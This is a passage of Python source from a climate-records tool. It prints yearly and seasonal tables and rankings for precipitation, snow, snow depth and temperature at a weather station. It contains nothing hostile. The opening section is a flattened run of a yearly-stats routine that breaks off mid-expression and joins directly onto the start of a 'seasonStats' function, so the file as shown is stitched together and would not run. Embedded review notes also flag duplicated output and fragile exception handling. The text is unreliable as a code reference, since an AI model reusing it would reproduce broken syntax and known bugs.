"{:.1f}".format(round(mean(clmt[y][7]["tempAVGlist"]),1)) if 7 in clmt[y] and len(clmt[y][7]["tempAVGlist"]) > 2 
else "", "{:.1f}".format(round(mean(clmt[y][8]["tempAVGlist"]),1)) if 8 in clmt[y] and len(clmt[y][8]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][9]["tempAVGlist"]),1)) if 9 in clmt[y] and len(clmt[y][9]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][10]["tempAVGlist"]),1)) if 10 in clmt[y] and len(clmt[y][10]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][11]["tempAVGlist"]),1)) if 11 in clmt[y] and len(clmt[y][11]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][12]["tempAVGlist"]),1)) if 12 in clmt[y] and len(clmt[y][12]["tempAVGlist"]) > 2 else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TMAX", "{:.1f}".format(round(mean(clmt[y][7]["tmax"]),1)) if 7 in clmt[y] and len(clmt[y][7]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][8]["tmax"]),1)) if 8 in clmt[y] and len(clmt[y][8]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][9]["tmax"]),1)) if 9 in clmt[y] and len(clmt[y][9]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][10]["tmax"]),1)) if 10 in clmt[y] and len(clmt[y][10]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][11]["tmax"]),1)) if 11 in clmt[y] and len(clmt[y][11]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][12]["tmax"]),1)) if 12 in clmt[y] and len(clmt[y][12]["tmax"]) > 1 else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TMIN", "{:.1f}".format(round(mean(clmt[y][7]["tmin"]),1)) if 7 in clmt[y] and len(clmt[y][7]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][8]["tmin"]),1)) if 8 in clmt[y] and len(clmt[y][8]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][9]["tmin"]),1)) if 9 in clmt[y] and len(clmt[y][9]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][10]["tmin"]),1)) if 10 in clmt[y] and len(clmt[y][10]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][11]["tmin"]),1)) if 11 in clmt[y] and len(clmt[y][11]["tmin"]) > 1 else "", 
"{:.1f}".format(round(mean(clmt[y][12]["tmin"]),1)) if 12 in clmt[y] and len(clmt[y][12]["tmin"]) > 1 else "", )) print("{:-^55}".format("")) print(" Total Precipitation: {}".format(round(sum(clmt[y]["prcp"]),2)),end="") try: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(clmt[y]["prcp"]),2))+1)),end="") if sum(clmt[y]["prcp"]) > 0 and prcpdeschist.index(round(sum(clmt[y]["prcp"]),2)) <= prcpaschist.index(round(sum(clmt[y]["prcp"]),2)) else print("",end="") except: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(clmt[y]["prcp"]),2))+1)),end="") try: print(", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(clmt[y]["prcp"]),2))+1))) if clmt[y]["recordqty"] > excludeyear and prcpaschist.index(round(sum(clmt[y]["prcp"]),2)) <= prcpdeschist.index(round(sum(clmt[y]["prcp"]),2)) else print("") except: print("") print(" Total Precipitation Days (>=T): {}".format(clmt[y]["prcpDAYS"]),end="") try: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(clmt[y]["prcpDAYS"])+1)),end="") if clmt[y]["prcpDAYS"] > 0 and prcpDAYSdeschist.index(clmt[y]["prcpDAYS"]) <= prcpDAYSaschist.index(clmt[y]["prcpDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(clmt[y]["prcpDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(prcpDAYSaschist.index(clmt[y]["prcpDAYS"])+1))) if prcpDAYSaschist.index(clmt[y]["prcpDAYS"]) <= prcpDAYSdeschist.index(clmt[y]["prcpDAYS"]) else print("") except: print("") if round(sum(clmt[y]["prcp"]),2) > 0: print(" -- Highest Daily Precip: {}".format(clmt[y]["prcpPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["prcpPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["prcpPROP"]["day_max"][1][len(clmt[y]["prcpPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) print(" Total Snow: {}".format(round(sum(clmt[y]["snow"]),1)),end="") try: print(", Rank: {} 
Snowiest".format(rank(snowdeschist.index(round(sum(clmt[y]["snow"]),1))+1)),end="") if sum(clmt[y]["snow"]) > 0 and snowdeschist.index(round(sum(clmt[y]["snow"]),1)) <= snowaschist.index(round(sum(clmt[y]["snow"]),1)) else print("",end="") except: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(clmt[y]["snow"]),1))+1)),end="") try: print(", Rank: {} Least-Snowiest".format(rank(snowaschist.index(round(sum(clmt[y]["snow"]),1))+1))) if clmt[y]["recordqty"] > excludeyear and snowaschist.index(round(sum(clmt[y]["snow"]),1)) <= snowdeschist.index(round(sum(clmt[y]["snow"]),1)) else print("") except: print("") if round(sum(clmt[y]["snow"]),1) > 0: print(" -- Highest Daily Snow: {}".format(clmt[y]["snowPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["snowPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["snowPROP"]["day_max"][1][len(clmt[y]["snowPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) print(" Total Snow Days (>=T): {}".format(clmt[y]["snowDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(clmt[y]["snowDAYS"])+1)),end="") if clmt[y]["snowDAYS"] > 0 and snowDAYSdeschist.index(clmt[y]["snowDAYS"]) <= snowDAYSaschist.index(clmt[y]["snowDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(clmt[y]["snowDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(clmt[y]["snowDAYS"])+1))) if clmt[y]["recordqty"] > excludeyear and snowDAYSaschist.index(clmt[y]["snowDAYS"]) <= snowDAYSdeschist.index(clmt[y]["snowDAYS"]) else print("") except: print("") if clmt[y]["snwdDAYS"] > 0: print(" Total Days w/Snow on the Ground (>=T): {}".format(clmt[y]["snwdDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(clmt[y]["snwdDAYS"])+1)),end="") if clmt[y]["snwdDAYS"] > 0 and snwdDAYSdeschist.index(clmt[y]["snwdDAYS"]) <= snwdDAYSaschist.index(clmt[y]["snwdDAYS"]) else print("",end="") except: 
print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(clmt[y]["snwdDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snwdDAYSaschist.index(clmt[y]["snwdDAYS"])+1))) if clmt[y]["recordqty"] > excludeyear and snwdDAYSaschist.index(clmt[y]["snwdDAYS"]) <= snwdDAYSdeschist.index(clmt[y]["snwdDAYS"]) else print("") except: print("") if round(sum(clmt[y]["snwd"]),1) > 0: print(" -- Highest Daily Snow-Depth: {}".format(clmt[y]["snwdPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["snwdPROP"]["day_max"][1][len(clmt[y]["snwdPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) try: print(" Average Temperature: {}".format(round(mean(clmt[y]["tempAVGlist"]),1)),end="") print(", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(clmt[y]["tempAVGlist"]),1))+1)),end="") if len(clmt[y]["tempAVGlist"]) > excludeyear*2 and tavgdeschist.index(round(mean(clmt[y]["tempAVGlist"]),1)) <= tavgaschist.index(round(mean(clmt[y]["tempAVGlist"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(clmt[y]["tempAVGlist"]),1))+1))) if len(clmt[y]["tempAVGlist"]) > excludeyear*2 and tavgaschist.index(round(mean(clmt[y]["tempAVGlist"]),1)) <= tavgdeschist.index(round(mean(clmt[y]["tempAVGlist"]),1)) else print("") except: print(" Average Temperature: N/A") try: print(" Avg MAX Temperature: {}".format(round(mean(clmt[y]["tmax"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(clmt[y]["tmax"]),1))+1)),end="") if len(clmt[y]["tmax"]) > excludeyear and tmaxdeschist.index(round(mean(clmt[y]["tmax"]),1)) <= tmaxaschist.index(round(mean(clmt[y]["tmax"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(clmt[y]["tmax"]),1))+1))) if len(clmt[y]["tmax"]) > excludeyear and tmaxaschist.index(round(mean(clmt[y]["tmax"]),1)) <= tmaxdeschist.index(round(mean(clmt[y]["tmax"]),1)) 
else print("") except: print(" Avg MAX Temperature: N/A") if clmt[y]["tmaxPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMAX: {}".format(clmt[y]["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["tmaxPROP"]["day_max"][1][len(clmt[y]["tmaxPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if clmt[y]["tmaxPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMAX: {}".format(clmt[y]["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in clmt[y]["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["tmaxPROP"]["day_min"][1][len(clmt[y]["tmaxPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) try: print(" Avg MIN Temperature: {}".format(round(mean(clmt[y]["tmin"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(clmt[y]["tmin"]),1))+1)),end="") if len(clmt[y]["tmin"]) > excludeyear and tmindeschist.index(round(mean(clmt[y]["tmin"]),1)) <= tminaschist.index(round(mean(clmt[y]["tmin"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(clmt[y]["tmin"]),1))+1))) if len(clmt[y]["tmin"]) > excludeyear and tminaschist.index(round(mean(clmt[y]["tmin"]),1)) <= tmindeschist.index(round(mean(clmt[y]["tmin"]),1)) else print("") except: print(" Avg MIN Temperature: N/A") if clmt[y]["tminPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMIN: {}".format(clmt[y]["tminPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["tminPROP"]["day_max"][1][len(clmt[y]["tminPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if clmt[y]["tminPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMIN: {}".format(clmt[y]["tminPROP"]["day_min"][0]),end = " ::: ") for x in clmt[y]["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != 
def seasonStats(y,season):
    """Report on recorded statistics for a meteorological season of interest
    from a specific year. It accepts only arguments for the inquired year, and
    season. The year must be an integer while the season must be in string
    format.

    seasonStats(YYYY,SEASON)

    EXAMPLE: seasonStats(1933,"winter") -> Returns a printout of stats from
    the Meteorological Winter of 1933 (inclusive of December 1933 - February
    of 1934)
    """
    # Guard clauses: clmtAnalyze must have populated the module-level clmt /
    # metclmt dictionaries, the requested meteorological year must exist, and
    # the season string must be one of the recognized names.
    if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.")
    if y not in metclmt: return print("Meteorological Year {} Not Found! Try again!".format(y))
    if season.lower() not in ["spring","summer","fall","autumn","winter"]: return print("'{}' is not a valid season. Try again!".format(season))
    if season.lower() == "autumn": season = "fall"  # "autumn" is accepted as an alias of "fall"
    season = season.lower() # Puts season into requisite lower case to match metclmt[y] season dictionaries
    # The three calendar month numbers composing this meteorological season,
    # taken from the season's "valid" list (e.g. [3,4,5] for spring).
    m1 = metclmt[y][season]["valid"][0]
    m2 = metclmt[y][season]["valid"][1]
    m3 = metclmt[y][season]["valid"][2]
    # All-years ascending ("as") and descending ("des") ranking lists for each
    # tracked variable; seasonStatsRun=True makes seasonRank return them for
    # reuse here instead of printing its own report.
    prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist = seasonRank(season,"temp",5,seasonStatsRun=True)
    # Snow-depth-day ranking lists are built locally (seasonRank does not
    # supply them). Integer keys of metclmt are years; non-int keys hold
    # station metadata and are filtered out.
    try:
        snwdDAYSdeschist = sorted(set(list(metclmt[YR][season]["snwdDAYS"] for YR in [Y for Y in metclmt if type(Y) == int] if metclmt[YR][season]["snwdDAYS"] != 0)),reverse=True)
        snwdDAYSaschist = sorted(set(list(metclmt[YR][season]["snwdDAYS"] for YR in [Y for Y in metclmt if type(Y) == int] if metclmt[YR][season]["recordqty"] > excludeyear)))
    except Exception as e:
        print(e)
    # ---- Report header -----------------------------------------------------
    print("{:-^40}".format(""))
    # Winter spans the year boundary (Dec y - Feb y+1), so label it "y-YY".
    if season == "winter": print("{:^40}".format("Seasonal Statistics for Meteorological {} {}-{}".format(season.capitalize(),y,str(y+1)[2:])))
    else: print("{:^40}".format("Seasonal Statistics for Meteorological {} {}".format(season.capitalize(),y)))
    print("{:^40}".format("{}: {}".format(metclmt["station"],metclmt["station_name"])))
    print("{:^40}".format("Quantity of Records: {}".format(metclmt[y][season]["recordqty"])))
    # Too few daily records in the season -> warn that stats may be partial.
    if metclmt[y][season]["recordqty"] <= excludeseason:
        print("{:-^40}".format(""))
        print("*** SEASONAL STATS LIKELY NOT COMPLETE FOR RELIANCE ON STATISTICS ***")
        print("{:-^40}".format(""))
    # metclmt[YYYY][s]["valid"] = [3,4,5]
    # Month column headers: Jan/Feb of a winter belong to calendar year y+1.
    print("{:^6}|{:^10}|{:^10}|{:^10}|".format(
        "",
        "{} {}".format(calendar.month_abbr[m1].upper(),y) if m1 in [3,4,5,6,7,8,9,10,11,12] else "{} {}".format(calendar.month_abbr[m1].upper(),y+1),
        "{} {}".format(calendar.month_abbr[m2].upper(),y) if m2 in [3,4,5,6,7,8,9,10,11,12] else "{} {}".format(calendar.month_abbr[m2].upper(),y+1),
        "{} {}".format(calendar.month_abbr[m3].upper(),y) if m3 in [3,4,5,6,7,8,9,10,11,12] else "{} {}".format(calendar.month_abbr[m3].upper(),y+1)
    ))
    # Per-month summary rows; a month missing from metclmt[y] prints blank.
    print("{:^6}|{:>8} |{:>8} |{:>8} |".format(
        "PRCP",
        "{:.2f}".format(round(sum(metclmt[y][m1]["prcp"]),2)) if m1 in metclmt[y] else "",
        "{:.2f}".format(round(sum(metclmt[y][m2]["prcp"]),2)) if m2 in metclmt[y] else "",
        "{:.2f}".format(round(sum(metclmt[y][m3]["prcp"]),2)) if m3 in metclmt[y] else ""
    ))
    # SNOW: " -- " marks a month that is present but recorded zero snowfall
    # (a positive snowDAYS count with zero total still shows the 0.0 figure).
    print("{:^6}|{:>8} |{:>8} |{:>8} |".format(
        "SNOW",
        "{:.1f}".format(round(sum(metclmt[y][m1]["snow"]),1)) if m1 in metclmt[y] and (sum(metclmt[y][m1]["snow"]) > 0 or metclmt[y][m1]["snowDAYS"] > 0) else (" -- " if m1 in metclmt[y] and sum(metclmt[y][m1]["snow"]) == 0 else ""),
        "{:.1f}".format(round(sum(metclmt[y][m2]["snow"]),1)) if m2 in metclmt[y] and (sum(metclmt[y][m2]["snow"]) > 0 or metclmt[y][m2]["snowDAYS"] > 0) else (" -- " if m2 in metclmt[y] and sum(metclmt[y][m2]["snow"]) == 0 else ""),
        "{:.1f}".format(round(sum(metclmt[y][m3]["snow"]),1)) if m3 in metclmt[y] and (sum(metclmt[y][m3]["snow"]) > 0 or metclmt[y][m3]["snowDAYS"] > 0) else (" -- " if m3 in metclmt[y] and sum(metclmt[y][m3]["snow"]) == 0 else "")
    ))
    # TAVG requires at least 3 daily averages before a monthly mean is shown;
    # TMAX/TMIN below require at least 2 observations.
    print("{:^6}|{:>8} |{:>8} |{:>8} |".format(
        "TAVG",
        "{:.1f}".format(round(mean(metclmt[y][m1]["tempAVGlist"]),1)) if m1 in metclmt[y] and len(metclmt[y][m1]["tempAVGlist"]) > 2 else "",
        "{:.1f}".format(round(mean(metclmt[y][m2]["tempAVGlist"]),1)) if m2 in metclmt[y] and len(metclmt[y][m2]["tempAVGlist"]) > 2 else "",
        "{:.1f}".format(round(mean(metclmt[y][m3]["tempAVGlist"]),1)) if m3 in metclmt[y] and len(metclmt[y][m3]["tempAVGlist"]) > 2 else ""
    ))
    print("{:^6}|{:>8} |{:>8} |{:>8} |".format(
        "TMAX",
        "{:.1f}".format(round(mean(metclmt[y][m1]["tmax"]),1)) if m1 in metclmt[y] and len(metclmt[y][m1]["tmax"]) > 1 else "",
        "{:.1f}".format(round(mean(metclmt[y][m2]["tmax"]),1)) if m2 in metclmt[y] and len(metclmt[y][m2]["tmax"]) > 1 else "",
        "{:.1f}".format(round(mean(metclmt[y][m3]["tmax"]),1)) if m3 in metclmt[y] and len(metclmt[y][m3]["tmax"]) > 1 else ""
    ))
    print("{:^6}|{:>8} |{:>8} |{:>8} |".format(
        "TMIN",
        "{:.1f}".format(round(mean(metclmt[y][m1]["tmin"]),1)) if m1 in metclmt[y] and len(metclmt[y][m1]["tmin"]) > 1 else "",
        "{:.1f}".format(round(mean(metclmt[y][m2]["tmin"]),1)) if m2 in metclmt[y] and len(metclmt[y][m2]["tmin"]) > 1 else "",
        "{:.1f}".format(round(mean(metclmt[y][m3]["tmin"]),1)) if m3 in metclmt[y] and len(metclmt[y][m3]["tmin"]) > 1 else ""
    ))
    print("{:-^40}".format(""))
    # ---- Seasonal totals and rankings --------------------------------------
    # Ranking pattern used throughout: list.index() raises ValueError when the
    # season's value was excluded from a ranking list, so each rank print sits
    # inside try/except; the "<=" comparison between the descending and
    # ascending positions prints only the better (or tied) side of each pair.
    # NOTE(review): several except branches call .index() again on the same
    # value and would re-raise if that lookup was what failed -- presumably
    # those paths are rare; confirm before relying on them.
    print(" Total Precipitation: {}".format(round(sum(metclmt[y][season]["prcp"]),2)),end="")
    try: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(metclmt[y][season]["prcp"]),2))+1)),end="") if sum(metclmt[y][season]["prcp"]) > 0 and prcpdeschist.index(round(sum(metclmt[y][season]["prcp"]),2)) <= prcpaschist.index(round(sum(metclmt[y][season]["prcp"]),2)) else print("",end="")
    except: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(metclmt[y][season]["prcp"]),2))+1)),end="")
    try: print(", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(metclmt[y][season]["prcp"]),2))+1))) if metclmt[y][season]["recordqty"] > excludeseason and prcpaschist.index(round(sum(metclmt[y][season]["prcp"]),2)) <= prcpdeschist.index(round(sum(metclmt[y][season]["prcp"]),2)) else print("")
    except: print("")
    print(" Total Precipitation Days (>=T): {}".format(metclmt[y][season]["prcpDAYS"]),end="")
    try: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(metclmt[y][season]["prcpDAYS"])+1)),end="") if metclmt[y][season]["prcpDAYS"] > 0 and prcpDAYSdeschist.index(metclmt[y][season]["prcpDAYS"]) <= prcpDAYSaschist.index(metclmt[y][season]["prcpDAYS"]) else print("",end="")
    except: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(metclmt[y][season]["prcpDAYS"])+1)),end="")
    try: print(", Rank: {} Least".format(rank(prcpDAYSaschist.index(metclmt[y][season]["prcpDAYS"])+1))) if prcpDAYSaschist.index(metclmt[y][season]["prcpDAYS"]) <= prcpDAYSdeschist.index(metclmt[y][season]["prcpDAYS"]) else print("")
    except: print("")
    # Days that produced the season's single largest daily precipitation.
    if round(sum(metclmt[y][season]["prcp"]),2) > 0:
        print(" -- Highest Daily Precip: {}".format(metclmt[y][season]["prcpPROP"]["day_max"][0]),end=" ::: ")
        for x in range(len(metclmt[y][season]["prcpPROP"]["day_max"][1])):
            if x != len(metclmt[y][season]["prcpPROP"]["day_max"][1])-1: print("{},".format(metclmt[y][season]["prcpPROP"]["day_max"][1][x].daystr),end=" ")
            else: print("{}".format(metclmt[y][season]["prcpPROP"]["day_max"][1][x].daystr))
    # The entire snow section is skipped for seasons with no snow at all.
    if round(sum(metclmt[y][season]["snow"]),1) > 0 or metclmt[y][season]["snowDAYS"] > 0:
        print(" Total Snow: {}".format(round(sum(metclmt[y][season]["snow"]),1)),end="")
        try: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(metclmt[y][season]["snow"]),1))+1)),end="") if sum(metclmt[y][season]["snow"]) > 0 and snowdeschist.index(round(sum(metclmt[y][season]["snow"]),1)) <= snowaschist.index(round(sum(metclmt[y][season]["snow"]),1)) else print("",end="")
        except: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(metclmt[y][season]["snow"]),1))+1)),end="")
        try: print(", Rank: {} Least-Snowiest".format(rank(snowaschist.index(round(sum(metclmt[y][season]["snow"]),1))+1))) if metclmt[y][season]["recordqty"] > excludeseason and snowaschist.index(round(sum(metclmt[y][season]["snow"]),1)) <= snowdeschist.index(round(sum(metclmt[y][season]["snow"]),1)) else print("")
        except: print("")
        print(" Total Snow Days (>=T): {}".format(metclmt[y][season]["snowDAYS"]),end="")
        try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"])+1)),end="") if metclmt[y][season]["snowDAYS"] > 0 and snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"]) <= snowDAYSaschist.index(metclmt[y][season]["snowDAYS"]) else print("",end="")
        except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"])+1)),end="")
        try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(metclmt[y][season]["snowDAYS"])+1))) if metclmt[y][season]["recordqty"] > excludeseason and snowDAYSaschist.index(metclmt[y][season]["snowDAYS"]) <= snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"]) else print("")
        except: print("")
        if metclmt[y][season]["snowPROP"]["day_max"][0] > 0:
            print(" -- Highest Daily Snow: {}".format(metclmt[y][season]["snowPROP"]["day_max"][0]),end=" ::: ")
            for x in range(len(metclmt[y][season]["snowPROP"]["day_max"][1])):
                if x != len(metclmt[y][season]["snowPROP"]["day_max"][1])-1: print("{},".format(metclmt[y][season]["snowPROP"]["day_max"][1][x].daystr),end=" ")
                else: print("{}".format(metclmt[y][season]["snowPROP"]["day_max"][1][x].daystr))
        # NOTE(review): this "Total Snow Days" block repeats the one above and
        # gates its Least rank on excludeyear rather than excludeseason; it
        # looks like a copy/paste leftover from the yearly-stats function --
        # confirm and remove if the duplicated output line is unintended.
        print(" Total Snow Days (>=T): {}".format(metclmt[y][season]["snowDAYS"]),end="")
        try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"])+1)),end="") if metclmt[y][season]["snowDAYS"] > 0 and snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"]) <= snowDAYSaschist.index(metclmt[y][season]["snowDAYS"]) else print("",end="")
        except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"])+1)),end="")
        try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(metclmt[y][season]["snowDAYS"])+1))) if metclmt[y][season]["recordqty"] > excludeyear and snowDAYSaschist.index(metclmt[y][season]["snowDAYS"]) <= snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"]) else print("")
        except: print("")
    # Snow-depth (snow on the ground) day counts and rankings.
    if metclmt[y][season]["snwdDAYS"] > 0:
        print(" Total Days w/Snow on the Ground (>=T): {}".format(metclmt[y][season]["snwdDAYS"]),end="")
        try: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(metclmt[y][season]["snwdDAYS"])+1)),end="") if metclmt[y][season]["snwdDAYS"] > 0 and snwdDAYSdeschist.index(metclmt[y][season]["snwdDAYS"]) <= snwdDAYSaschist.index(metclmt[y][season]["snwdDAYS"]) else print("",end="")
        except: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(metclmt[y][season]["snwdDAYS"])+1)),end="")
        try: print(", Rank: {} Least".format(rank(snwdDAYSaschist.index(metclmt[y][season]["snwdDAYS"])+1))) if metclmt[y][season]["recordqty"] > excludeyear and snwdDAYSaschist.index(metclmt[y][season]["snwdDAYS"]) <= snwdDAYSdeschist.index(metclmt[y][season]["snwdDAYS"]) else print("")
        except: print("")
    if round(sum(metclmt[y][season]["snwd"]),1) > 0:
        print(" -- Highest Daily Snow-Depth: {}".format(metclmt[y][season]["snwdPROP"]["day_max"][0]),end = " ::: ")
        for x in metclmt[y][season]["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["snwdPROP"]["day_max"][1][len(metclmt[y][season]["snwdPROP"]["day_max"][1])-1] else print("{}".format(x.daystr))
    # Warn when the season has records but too few daily temperature averages.
    if len(metclmt[y][season]["tempAVGlist"]) <= excludeseason_tavg and metclmt[y][season]["recordqty"] > excludeseason:
        print("{:-^55}".format(""))
        print("*** INSUFFICIENT TEMPERATURE DATA FOR SEASON LIKELY ***")
        print("{:-^55}".format(""))
    # mean() on an empty list raises, routing to the "N/A" branch -- presumably
    # statistics.mean; confirm against the file's imports.
    try:
        print(" Average Temperature: {}".format(round(mean(metclmt[y][season]["tempAVGlist"]),1)),end="")
        print(", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1))+1)),end="") if len(metclmt[y][season]["tempAVGlist"]) > excludeseason*2 and tavgdeschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1)) <= tavgaschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1)) else print("",end="")
        print(", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1))+1))) if len(metclmt[y][season]["tempAVGlist"]) > excludeseason*2 and tavgaschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1)) <= tavgdeschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1)) else print("")
    except: print(" Average Temperature: N/A")
    try:
        print(" Avg MAX Temperature: {}".format(round(mean(metclmt[y][season]["tmax"]),1)),end="")
        print(", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(metclmt[y][season]["tmax"]),1))+1)),end="") if len(metclmt[y][season]["tmax"]) > excludeseason and tmaxdeschist.index(round(mean(metclmt[y][season]["tmax"]),1)) <= tmaxaschist.index(round(mean(metclmt[y][season]["tmax"]),1)) else print("",end="")
        print(", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(metclmt[y][season]["tmax"]),1))+1))) if len(metclmt[y][season]["tmax"]) > excludeseason and tmaxaschist.index(round(mean(metclmt[y][season]["tmax"]),1)) <= tmaxdeschist.index(round(mean(metclmt[y][season]["tmax"]),1)) else print("")
    except: print(" Avg MAX Temperature: N/A")
    # -999 is the sentinel for "no data" on the daily-extreme records below.
    if metclmt[y][season]["tmaxPROP"]["day_max"][0] != -999:
        print(" -- Warmest Daily TMAX: {}".format(metclmt[y][season]["tmaxPROP"]["day_max"][0]),end = " ::: ")
        for x in metclmt[y][season]["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["tmaxPROP"]["day_max"][1][len(metclmt[y][season]["tmaxPROP"]["day_max"][1])-1] else print("{}".format(x.daystr))
    if metclmt[y][season]["tmaxPROP"]["day_min"][0] != -999:
        print(" -- Coolest Daily TMAX: {}".format(metclmt[y][season]["tmaxPROP"]["day_min"][0]),end = " ::: ")
        for x in metclmt[y][season]["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["tmaxPROP"]["day_min"][1][len(metclmt[y][season]["tmaxPROP"]["day_min"][1])-1] else print("{}".format(x.daystr))
    try:
        print(" Avg MIN Temperature: {}".format(round(mean(metclmt[y][season]["tmin"]),1)),end="")
        print(", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(metclmt[y][season]["tmin"]),1))+1)),end="") if len(metclmt[y][season]["tmin"]) > excludeseason and tmindeschist.index(round(mean(metclmt[y][season]["tmin"]),1)) <= tminaschist.index(round(mean(metclmt[y][season]["tmin"]),1)) else print("",end="")
        print(", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(metclmt[y][season]["tmin"]),1))+1))) if len(metclmt[y][season]["tmin"]) > excludeseason and tminaschist.index(round(mean(metclmt[y][season]["tmin"]),1)) <= tmindeschist.index(round(mean(metclmt[y][season]["tmin"]),1)) else print("")
    except: print(" Avg MIN Temperature: N/A")
    if metclmt[y][season]["tminPROP"]["day_max"][0] != -999:
        print(" -- Warmest Daily TMIN: {}".format(metclmt[y][season]["tminPROP"]["day_max"][0]),end = " ::: ")
